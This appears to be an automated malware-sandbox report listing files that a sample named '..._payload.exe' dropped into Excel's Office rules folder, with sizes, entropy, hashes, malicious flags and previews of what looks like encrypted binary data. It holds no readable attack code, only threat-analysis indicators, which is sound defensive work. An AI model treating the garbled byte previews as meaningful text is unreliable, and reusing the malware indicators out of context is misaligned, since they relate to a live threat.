                                                                                                                                                                      Preview:<?xml.^....-}JD.]}..=.D.....!(2.D..Xxf..D...*..-.P..@[...@,X):..~\....[..zH..^.t-!=n...f8..d"....|~|C7.YO.>.<q}......RY.n.#N..wA...S.S...>.l.@H.C.Zk.=m.9...~.{-R8..\...+....M.NM....Sq.......z...D;2.3...j..>..o.8.P.S..../`.1U.J^...<r..Xa...."....gmA.......shHuSC.VC.bL...ky1....p...M.P.Q..2...._.{..K.N....]..$/....'[.^..S.Op..........9C..M.>.m..FV[...[{G..F.=8.....4.....# .\-.R.d}rc... ..9^...L..*........R....~'..O*...............^.T.On..g.G......V........IC7.g..g".r.g.....Kr.?h...<r....-"c.X1(.=BY.~...6..l........&......eC./...[....M..l=.. .6..MM.h........R.p.......0..:}d.g.X.Y.0.s.ar...y,.h.. }n.}...0.+#4.{w.HX.H...R8....z:..Z..V>.DO..-"!P.a..n../.'uDf.%.!=..@g..|.[......`.......*Nb...s.....R.=ZJ...w.A..K.T......J./i.7..~[...Sx.F.\.rl...N.n2'..u...X.~|.!tD.u...=...z.z....k.`..;6.<...+.......$uSF.r.,.......W.U.......h...).)Q..`.j.R.?<3El..t..?.iy3u..7.[blj'.e..L.=..%..F.-......*.s6A........1.....M~.c.:....p.4.... .c..F.A.d.....r......fz.c...+s...S..9

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370002v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6109
                                                                                                                                                                      Entropy (8bit):7.965347751226031
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:2FpLfnWzA6ci2VztqUrmjRxsFV7/kHiiD13Sny9lgRRsUQnPnKr8qPdotVsd78YI:sLOzA6ciKp7rmjRmVoCi53Sy3gRRsUU/
                                                                                                                                                                      MD5:CE586965272D4CBD8A13DA8E878D9C42
                                                                                                                                                                      SHA1:7C9514E4B2D97E93673BE908185B4BF503FA05F7
                                                                                                                                                                      SHA-256:132CE74135B8C7771B8501A3E31B49176465585D343CCFCADAFA975FFB3E47D4
                                                                                                                                                                      SHA-512:F9F4DA392B9B739D71FD9A3FB0BC2326D4D9EE74E1AC64628D5FAE0FA14808FFF0AD6F1CB8D5840EBDA2CFC9E77803C355252B6058F49C6D6F5EEF6EAA391075
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlF...Na.....1...#.9..O]z..>Mve..x..p.U.aG..A~~..G.C.P*.....r.%i.d<(..H..-.....q#.+.a.....U.R....x.Gv..E....Rm....HTJ./..?.-D&.ozvyr...7...<..h.J...|..Y...5l.J_.a...#....X..7..).{.(...r.Z...r...B..:@..Y.x...v..k..B.......N..4#{.....(.<o|.~`.....eg......-../>....Z.X.........u..S..3..D...g....#..(;..H...98-XG>..)..5|A.:..UT<..Z..f.o.*:.C.[........x@.*t>.....3..&...U.....,.zm~.c...au.8.f......?.Bu{.....a".-.H.=>j..A.h.].......:.0a..Z5...wEC.m....*5CgZk.:&..P.cQ1%.....dc....#...B..D.qn.......h.V.5.............Q.s.B.8.A..?...L..i._...bcC...F|.=.75.CI................Z..Ne......4.v..P....9n..[^.K..p.k?]...d...[.L....n..?...>U.e(....../......<.......a..=.}..]|n.v@M.$.........u.zNI.Q.B.5U...........0niJ...i.....0l......'(.#.........]i.^....#.`.~n!......Kq...K$83)=^...!c.....j.(.8>...j#..-...Cnk...*^B.Z45?.y:.X.j(.[ .Z.{.-...e6.(R.T.PJB...;k.j.../.N8..{..w....S9c6..2..P.....%.Kn....u.X..i...t.fx....E...s.......<...s...A.E.....>i.....v...(..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370005v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1454
                                                                                                                                                                      Entropy (8bit):7.840324298114445
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GtI7tXa3kSHrGQBQsZGC02pJshZdmFKmFQqtR017Yv0TC4DN+uD74itqIfV2bD:GQR0o/sZf02pKhrmQomlxDQziQauD
                                                                                                                                                                      MD5:83180D71F00E853F9B449793CB0FA248
                                                                                                                                                                      SHA1:D72F50BF61970FED3A7C53F115BD1E41E8CA5B56
                                                                                                                                                                      SHA-256:7F1F8B1C32430AB78759B080455F77394B91841F9FF062100890CCE4D3CB8D7C
                                                                                                                                                                      SHA-512:14F1B02B8F0C17CE0F70C5D1208BD5842880180898711E9978D8B833754E3ECB7AF2AF7A0B7B546E7F055BA10CF97F6D440B26C3134A91F1E7050EC1CC7E3AE1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...V..Py..8W.M....8b~..+..U.]..~-.M%....=._.UH4....*6q.N...42..v.r..0.\^}m......w..^0!..>.g.K..F....$^......%.nKe./J#.t...FF.....A.]...3.......p....'.....:e.Q.g..&S......eK...1.Igi.<.w.%y.....H..y....j...w%u..G.U...A.................fX.g...r.V.K...%..L.^....].wMD.^..f.J....z.pD..ES...m..&..p..@,.H...:..=......j...9..5....l..eg...mq^pp..=.a..oI.39....zM..C.......E.D..2R.0..~...fy4..pM.q.w...*.pf....1U.S5..}.v...FU?.....e.*....;.....(..(29.e%/f..@r........sH?5..'.3...Q=>...q..p....S.......M[^..GY.~. >.#8.;..B.yaW[5.X..<..U3.......pW...<>.....DE26g..%.1Q..B..R.c.!/*l.-..S....c...N...r....0.....'...[z.2z.X....fd.M... ...........X.....^k$e....P&7...j.4...c.A.a)...R.k%..F...x.[...\.(.h.qtn..%...J.nA!.:....L....<..2y2"........eNw![.;.T#.a!.9...~.9].f..r.2a8........o!......F...u.p.&rKd....f.~\.Hq.....i|....Q.l...l..p-2....8e..y.^z..h...7.&)[c..,q...;..p..p.G...v$.i.....Q.........=W[.AC0.....Q@_)1a.........V...X.e6.1...&=o^|..]..Y_...4=.;..'U.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370006v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1120
                                                                                                                                                                      Entropy (8bit):7.803517593615925
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9ESTSDuvOMnXyZJG3eg/lgs9XGaV30oDcknYzwRhHbBCxCcyWo2bD:LTaDsMJGu8jhGaNtSwRBFCccyWbD
                                                                                                                                                                      MD5:23434A83D1C797A05163C336D874F2C1
                                                                                                                                                                      SHA1:7D53DF0D9FBFBF44DF10A95B67E4100DB0D28BE4
                                                                                                                                                                      SHA-256:9588DEAC117F9E2E755B9929982AE907382E1E4E23EB4476DBB5F50CE80AE8D2
                                                                                                                                                                      SHA-512:2F937869F322A59EA24094B21CA8E00174A772FE96D9F06180000456D2A4CD5DEBA39F0EB9F1E40032E54BBB4EE2CBEFFF54EB55236BA0A0EDD2F2B5020703A4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...n.Ry..0..g....e......X.X8.v.$E....j...!.A.d.:W<S.L...E.w7k..Tc..}p+.U..gY7......>.gb./:9~m^T.-...I.7L.....t..d..j.Wc6..F.".y.<!p....`"..f...s.A_>...{.A.I...V.....X.'j..pn?.q..0!.l..R.q.$.I....$..K./^4....A.....nS-..c........5o:V.....)=k..D..(=eA...8.....bc..03.IP.;......W.=@...m#...P..c.R.BZ....... HV*.z..^.=..Z......&>.y...IL.4.G...........G+.)fp..8~.(K.H....()..X.a.<&....$...V.)V.=..w.;z:.I.o....ht...W.:.\...|.E..N..........5..F....KUf.V.w..)\.s...I...j.U...p..Wy..~.WP.s.a...@.>...u0.pw.7U..3..}.w{E.......S.....}7..uA......E.$............7..#.8.x..m...D._.Y.VD...x...i.T..0-|.M....].x.f...J..a].."f......V.fBp.Y..:..EM{.QfO.+..>3...>..........Zr..S;..#.w.W'r.Uk..P.j:!y...D.....qEH.<...,.B....;8.|.I...v.eA.0.m.pBX5..y..} .\P2%.a..Ai..,^.d'..a".,......S....O...^.%..b}h0.c%......O......I......CZ.v.h..x"...2.$Sq..5).....h.Q@...5.......#K46.D0:..9...r=...-.;..#.....UB...............K.S..e....^....@..H.....#..s9..*..L.U.\!..f...8...S(.1.G.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370007v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3678
                                                                                                                                                                      Entropy (8bit):7.950763900319035
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:SAdk+EsGLsFVA+pLcFc2o5b/rQRkEv5Cz:fG+EnsFVhpLvb5jdE4z
                                                                                                                                                                      MD5:BD48DE24057806F559D0BA7870BA233A
                                                                                                                                                                      SHA1:D50224E3EA05C397F7BF2E308B287931FC2651B1
                                                                                                                                                                      SHA-256:1CCB35F31D1D8590BDDA9CD95ED1BAF6B304E40BEB022B306C19DC3C6A8B22B2
                                                                                                                                                                      SHA-512:9F744E4CD4F7CAD5D11EA23FCB50E4BCB2CA99A906E385B88AFA265030ABC649B22D5B338C4B5D55367895E4962C895519D2C6EF36610C2FAD9BB12B24FADB33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml."2>.....?*...2..i.O".Y..p.`.....q."vSv..^a...g........_.........O%XY...Amw.U..>.5g..GX."....M..%..r.i...........`].:.G.!....Rv..AM.H...x"P{/.T..De&2^./....q..!....0.%.K.}-iu. ?J....V....32...mm.aAi.-ot.~X..`..Gg....,).+......[.L"g..S....Yb27......l]|...nu..=.y=.kS"..)......}.X'.yy]'Bd.o.(W. 7......ip.j..Az..e............wkk...4....c+..K.w.........3.....8....V&..`x...nnK(%aw}EJ4z@.|...Z.a..Y....^..&?O.8.D*.O.+U.)..`{_..=.C.6.......,]6.[.....k.:L.C.r~.l....T......h..0...D.5.#.0Q....#DA~9.kq..dQ.S..0;$ah...=......s.V..*a.....{b.D.tD.KP+..u2...^+]...qH...3..C...w...^...(n..=`.X....E.(...-K`....<4.d...p._.~Vf.....ss+\<...d...yJr.WB'h............f..._.r.H.....&"ei..v.B.^q.......i.9...6...7...eA{ ...4.I4..I..<....Z5....~?e....Ri"".DcAM8...~]\y.U..F.g.R........Q..2..$...V.N..X.&..>......o..8..~..vA.A.d....(.+$.........\:&&..K..w...b...W..a.epC...<.L...a63.U....B.l.c.]..........Z.Oq:.\..Ei.....;..d....gM...0<^.c..._...J....}........?C.+

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370009v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                      Entropy (8bit):7.752115513520191
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:1sx+7wEfQWKRugy7IscgYHI3UHsFwcsdX9Nwbfc42bD:1xXquFcgYoDEX9ubcrD
                                                                                                                                                                      MD5:D311E1E03B96C777E8FE26DB57A7D7AC
                                                                                                                                                                      SHA1:C70AD65F32745CA1935F2D6447C5E2C3314192CB
                                                                                                                                                                      SHA-256:D68433D20F3CB62C32A7E0780F656374776A0D2652F5C5F1E0E64F12F60BACA4
                                                                                                                                                                      SHA-512:C36F91C6B9C380D5EBB26968198CE60333435A33A6346E91DFC6F991244356514AB0F742E6930F7D267B5063C09719874139FC458B252A639177BA05D4BC1B0E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.q.^7{.Yd!.T..3....."..x.?.se....zG.X.0.'.b.\..Fh".1I7..!J.**..t.[...;NA4.+....9.w..2\..I.7.......a.@Z....=S@J6:.}v.(...JT.......4U6{_qJ......X.XA../.tm..T..n#4.(.....n."M....POFg}..s.pg..C^...J'.L8.tb....mS.r.l..c...T....$.J*.V......9..../.-.$j...<......g.....S.~.........aq...s...4.A...DuVDF|.E...N4FS.....q.,.*kk,.t...E.V.{...qTS`.SV...7..,.....kG.|..d.h....4..KX..r...m{..m.....h5O8.A.........U.......`...~GM..}......U.8...$.....+|...d.(.>pW.mjGF..g.....dR.Z..s..b..<j..D..$:......R' .....8..R...i]t.wW0.9!.....eO.....D..'d.....#;WR.[.$...TI1..E.5....`...J.7...+O.*..C".]bA.......V.r9..p./O-B....=hL*.7iH.e._|T....N:.5.....|.|.'s....E..PF.,...N...R.....{7.w>k>..)...@S;...@h...{y.d.u...pB.CJ.8..x.e...x<...2.....-.3.;..."W...X..K..Qx..Yl.#..}.....o.f..^...H.=P~]....N.e,..y..^.O.Nc...O.. F.....3.d.(y.A.0.:^.#....a?....A...{g.B.P.5.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370011v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1191
                                                                                                                                                                      Entropy (8bit):7.810232343793935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:G3vmjpnIFNLEh8ZVgcWtCSDVXtMs9jX/RUwIFO8CDfAECrVi2bD:YvmjpnIFVEE7R4fMsBvR0rCjwD
                                                                                                                                                                      MD5:80E772973BD239EE40456C31E0956E92
                                                                                                                                                                      SHA1:0FFAA4756335F7C53CCA7E2A558499827E07603E
                                                                                                                                                                      SHA-256:748FEC615DC6036D562E214E2CDC323E0F30F8B1BC9634B69E56250B87E32693
                                                                                                                                                                      SHA-512:0367A7DB151B693F2FFC3BAF916410015D9E73246ED6B913918809D9DD25C00F8202CFA8DE369D6E17DA3B4305A41AE8DABC341104CA53D60BED7095D7B3707A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....n.&,..".V).$..d....Q.o....2.^..b.....2...`.8l.JUBcN...o{..$..L...a.u@Y..*[{*... r'..&./...az...7...pp.d...JN..3..g....+q.H.3..}.&..[........6+.N.. ..?7...v..2dW.7.0..-C.QO....=....;..../1B-._....L...N.....l.Ksu.m@C.(I.E....j.\..HE0......[.W/..../_.7@.T`$..g.nL.U..H.a.U.R../yr...%.~9..M.. .2. P.......e...,b...Mz...').;a.D.#.Nm,.G.....bq.!.R}...W..@.e...2'Z.....s[:..1....n.....V.(..b5[t..q.".l..YB,.R.?.p.y......t........n.|1......v..8W.....63..F.j.q...#.;......O.96....X...v.7T.S.bIL..].>a$G (..".*..?y...q....~*.mw/.m;j..r.H......$]....E4.....Q.$.1.W.e>.x......p..?.Q..g..+..u`./.g?.I0...U..(...=>.6p.U.A.....m.,..s.@.(A|.-<..R....g...Qxg!..eFGa}..N..J..4.....p..g.Y. .....nqEcIpn..2K..%..&..Q.V.[....xO.:...5.R.eV.3......[m..0`..e.;....1..2[.x.G...+...!...B..b..t=.J".O*...^...c...........[.k..{R.d.....w..g.Cb.4.-.$..V.'.....P{..-...*....f....-.f6..x.U,...).:/3..l...p..B2.M........E.Y....3..U...lT.....'..{.n.Wd.~..zQR7..[;8.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule370012v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):732
                                                                                                                                                                      Entropy (8bit):7.692766282282908
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:w0RhYXAzJ+TPUZPASS8onI7jOcLYkA+p/F7HMya3+rZ5tFq+In3OjozhMFSUdNcq:w0R6XwJMU5AT8onWjbsNgFbxaurHtpIu
                                                                                                                                                                      MD5:75AA7C7620A005A1EDCB83C1B5727059
                                                                                                                                                                      SHA1:24E84D4A75576D7F2113A2455F7652091E910C61
                                                                                                                                                                      SHA-256:F37194DE4FB689AB377B17359984292058C17A684A01917EAD86CB10CEA4DF3B
                                                                                                                                                                      SHA-512:A1C402C0B08A0EDDD34538FC07DFBB3CCD66E0F403B08E2D4D64B40A831C5CBF3A5400ED0BA965A22FDAD14D8CD95A5067182A7D7F100683C4E62EF2ED1F58E7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.4`.V^...b]..i..R.......dd.4L..vA.x....0g....H......(...t?@.#..,.(Ry..HC)`d\....{.............v...p.Lo..H..^.E...k/s...[..&.......:.W.y...D.6...H...Y'~.4h.,!.F.( 475...RL..%=..1......G0u...l...AI....y']r$...^~..lsh0..f.0...>.q...u.p.../0..p.f...n.6....z...d....U.b..F.c.3C.#v...?>.}#.....U..F.........0b..z.x._.....q.......q..).......1.....H......m.....aTH.'.Cd..1......|.\.^..G&Dfs.A..{.....).=.d.).......G..9.I.X.BI.9.]....\..G.x.cR...z...CR.4.O.....c..5......c..#B.i..E)S.\A....Y,.x.>.y%..V....m#X...........+O5.hKD.\...GM;.;..V..-.....i,.H......(..E..c./L.\.UD.:..)..........+.J..a./3...:..W.l...j..t.95.NmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390004v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3616
                                                                                                                                                                      Entropy (8bit):7.9379364648747
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:RrpVgvPxsL8+b867rOr8PxofvRCnuen5fVSBmHuH8yZvFJnO8bC+3U6plsH9lEwf:CvPxc8drUGTedQBmHGO89E6pOHDf
                                                                                                                                                                      MD5:FD0D46F9DAE173021071D8CACD20AFF0
                                                                                                                                                                      SHA1:4B1F1427B51B317B67D268CE386A9508288B89E2
                                                                                                                                                                      SHA-256:7ECFE190B7D048C4803BBE201DB70792FD306559DD194B76B747CBD536BD3620
                                                                                                                                                                      SHA-512:32ECD4AD8E32D027566EE55D0E94DA7C54BC66D5AD373EC740ED5F47D44D36E5E95B259FE0A9324A3DB8A1C06381F1E89DC4735BFAD5D9008D14520490086CC0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....|).7A.f.|...!.Pb.....I.Eu2Gvu....g..o+...4....48.v.Ub4......P..c....X4.....=.1].e...^06.y..eg...nulcf.....:g$Y... s^~.:.[s7.j)[;Z;...vc....P.7.j..@..IQe.C...H.,.'..Z....K..i........t.._`..Z..B..R.D...0.E ..d.1..IrP.Wq...[..g.5;.T.9..K.s.V..h+.M..Z".d..&M.<....m....*...k,..z..N3...4...7j..p]....]...=S..T....o._.-..2O...q..%.?jB..C.e.f4.r@..;......Q..8=.CQPsS..f..C......7.3...ho4.C..K.T....co...u..;+sG...x.K....A>..4.@L0.....(..2DK./.r..bY"x..."... BX...ep.Sto]...w.Mp.l...2..._n..G..O......E.......]....@..3...e1......(.<....]>...pm.....v.j....zN..fn.Vw.G/Lp5..U.]X........=b.b...2G.(..e.|.M"...f....~.... .....G....U..z.S.<.. .{m..2+?...}.#....E..w....'.y.n..~^62.I`.LB=..8'.p/18z..........g/.A4.......'.:4.....>.d8.]...D^...0hU.@..o.P.R%..-..8..v.M..H.o.m=.'.....6.:.".u.hc..6..~]yL..I..i.Hh.q.{..|..b.p..!.B.f.&)mh2n.q.F.o..o1.\..e..v...G78..v.........c....0lV.....[...V....fb.,..ni...\.J...o...y..=....$.T<[..t.H.......B.G...p..2.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule390005v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):783
                                                                                                                                                                      Entropy (8bit):7.726640498661874
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:llVxEGa0ywLppN9ZdPuvTOk8rgcfktBnnOqAc+a0j6KnSLQNHEuZOM+HhO+EH01g:llDw+ppNkTOlqBt5c6K++O1OHH4lT2bD
                                                                                                                                                                      MD5:26FED5C2D44CFB69EE5ABB7099B9ED02
                                                                                                                                                                      SHA1:369A84832B9385F0DF9B01323DCDCDF8C50B189E
                                                                                                                                                                      SHA-256:28E143928176D58CF7C77E9D4F50210343E824D900DCF17C4ADAB68BA083DE8C
                                                                                                                                                                      SHA-512:CDB60CAD26F6AA7EBA3F97F0FE06485AFDE534A69A8AC925D4D6666AD34E9F1AB517518D803E78F53874238D3425962D782262DCD26A25A0AC6C809214881308
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...(...d....1......l=$Ld.N..w./..rM..@^R.Ut>4....../%<...}..m..B:.l.t8..*..7c..V..c.8.;...L.V.Ip......d....-&.|0.r....3W..'m.O.*!....\F.w......p7.Y...#J.R...r...T..B.~.C.%..PQc...)..#o..@p%.....I..]..}.+|s...[.L.J..Eu..|...[...s.....i<a...d.#.<.T^.....C.E. ....].....tD.w.E...g......e.v.\L5.OY{s.!O*U..)...(..{V.VB.k...G.R....@].p..>.....a.&....<. .H]!AQ..[.]-..A.".H.'.H.9....2K.t[s5+......w....".@.p.8.D....|....B,......SC..C.i..ia..r9....].A..w.cp`x..."h.x..(M..6.Wm..Ql.....]v.:9.~!].K.N.c_.St..Pv....#..e?....$}.A.......o.Z...7.)`lM.0=a....B.5.......A.....ZD.....R9)3..).....Il.(M...qJ..P.P.AZ.qu.>....Q...~.....c..5.d..:. ...@.+I....8...E.\K.xR....ySx4$mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440000v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2331
                                                                                                                                                                      Entropy (8bit):7.928062605390472
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:XFTMMM6qdFVhfLT6y82D6gl53bhqrcnmEcOif7CMqXeTSlD:VMGq/7n+A3gAnrYf7HquOd
                                                                                                                                                                      MD5:4AF98E189761B5686E0ECB4888A3D6B4
                                                                                                                                                                      SHA1:0713A168E5FC87EFCF5094723C5DEEFEDAD1D33E
                                                                                                                                                                      SHA-256:C5B23E62D141AAD94DBC5BF3EE7271522E937BC9BFDBC12CF0ACB186F628253C
                                                                                                                                                                      SHA-512:D3CA73C9A065E8BFD75FD28FC689C450B371B16497719A7CAFB558C504EA7F703F8087AE0093BF3D425616799189F051AD8BF5C52D7F2DC443732F09D9D92ECC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..DJO.c..H.~a...p0n...<....|.L.....E.Xa [RP...k....Zx.*.7..$.l..Z...H...."&........l'".....p...T.d..EVo...m-..|... W.3b.'..wC.....K..R.+.Dh.^h.K..0.0.. Z;..4.....b,..N.C<....\......L).#Y...C...|.Hae.......ul.{28...E.li>.?......{q....i..\k..~...a_ne>}......-..^.1....}.:..K.mB.U...u.r6.p......'......... [..N.0Q.......=...%.1....K..".Jx(....@_.9...~aM.-cb.G.../...@.1,KQ.T...f..8.E.ba.=Z...v[,i.p.....-....a`.<..o...B.|.R.4Ax.gBQ.Y....7i........].3M./.U3.. -......O..XkR.Rj...mu......fd.....f.b..J..K.-..........B.~..P.;...kE...-.p...Q.:.n.3.yax...."w!....X.. $R.T.....Y....=...M.*....K..vw...\...*.p.....|..c..~.....UJ..D7.x.....tY.k.x2*..Xn..!.Z.V.J3.5./.I..SQ..M..4DnH...z.x.u9.E?V.....~.".....-.......lz.b.e./.....Mj1....u.l.......1..j..X..x..Q..d...mS....T.q^b%R.i(.h.jG......N.M...z..^.c.n.Ns...6U.[.j/.5?W..U...k....c|.aD.0F..B=c........Y...,.=x.[R.......y..O,.:...#Xe.....Y....u!.......]Q.w.... ..q.S.*.do...UC..<UtH..[m.C..!u._*.3w.q-+^...Bo.4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):44492
                                                                                                                                                                      Entropy (8bit):7.995674424791183
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:768:0duCeS3qXj6Bj/ct5YjeIogY9dpA6/hQ7uAPxHLZe/hxPsJqeDwpRaIAZ:OCEc4eIxYdushUNxrZe/hxPcqeDwvfW
                                                                                                                                                                      MD5:EBA52ABA42D1DE05B524C3046867DE68
                                                                                                                                                                      SHA1:C900A9E956162F448D5F7EAB730C09D24D8D1DB6
                                                                                                                                                                      SHA-256:7AE3A4D1450961EBBBF157CF0ED281B66B7D5E614FDD704B518D0DEBFDBF0D7E
                                                                                                                                                                      SHA-512:1DDBEA899A8AB92F6C4841B73556EB83E3886FAF0F384E36AEC2F70AC3CECA7603A351D159B35FA02E91558CEF547F19D530B06E803B3E0A90920553E746E63B
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:<?xml.N...E.....T...&i..O..y.Go..b..qb.H.......2..D:4.n...M.E....%....%,.7.@x...6.g.e.......]..L....L..Bfr.F=..#(.[..5..r.I..{..`N.....e..2U...F.*C#.....s...H.1..f..\......Ew..h.....W.Y.d.m-..l..V.`n}4...-H..ELr{C.@.........^...........X.ye.`...) i9.`.....5.1f.5..h..... '").{...+Q)..^.Tz....S..hv.j(..[....b..$m.p.. .......94..L.$.g.c.5.v.C..7.8...1.........P.Y...e...X8..`... o..e........~t-mR ....E....G\..|}Ps.2...gr..K..v.vo...a....6...<L..E.B....0.'.P.d.[2..J>..S.h...?p1#.......hX.Q...z1}Q..ZiK...D..i.%.[.A.d@..%..>...f4(P&.iZF.t..JZ..qgf,.?.s..[x.mSr..`......C>8.,..`.)....V.*....\uVcv....x.K..............U .\.......@.y..3I...xEr.G.]D.Q..=r.Wi.K9....."....m...=.Z..K.r.?Z..^.%..b......Slal(....L.!....Ot4('Jb..A..R.T......S..Eu=wR.)&..jy...|.0...9.|....f.<Lx..~.:........&....H.(W.......F.@.:t{Xqo..[b.`.-..=.de..pO]..C.........@J..V......d..^...N}...Q...v0......p...CY.....x...v..b...K...4..-.Zg...$..Hf....V..mr..77....Y..zJ.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440004v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2338
                                                                                                                                                                      Entropy (8bit):7.925284667508211
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Dguf6qv/dqDOGOH7ed5vnCH7AV2+6/Sx53w67yiRyjZNqkPlTcPAd8dCxHybSpiE:pSqsLdVVw+6G5gVqcNLPlwAzxwAl
                                                                                                                                                                      MD5:612AD79CE46A0E5B124E379AE762A6FA
                                                                                                                                                                      SHA1:14B156585834386FBEFB7BEDDC0B987661A476BE
                                                                                                                                                                      SHA-256:098CB0F444AD46DB08B61F11E2160F3579446A5E4AFFCDE55A55CA3254898EEB
                                                                                                                                                                      SHA-512:A56DA05D14274069446908A23F6DA38F2EC2B065899ED144A0291BBE411B91FDCD61F37301D5DF0C342D859CB964B03035F88B6C4805DF877ACFF4A66DCE06EF
                                                                                                                                                                      Malicious:false
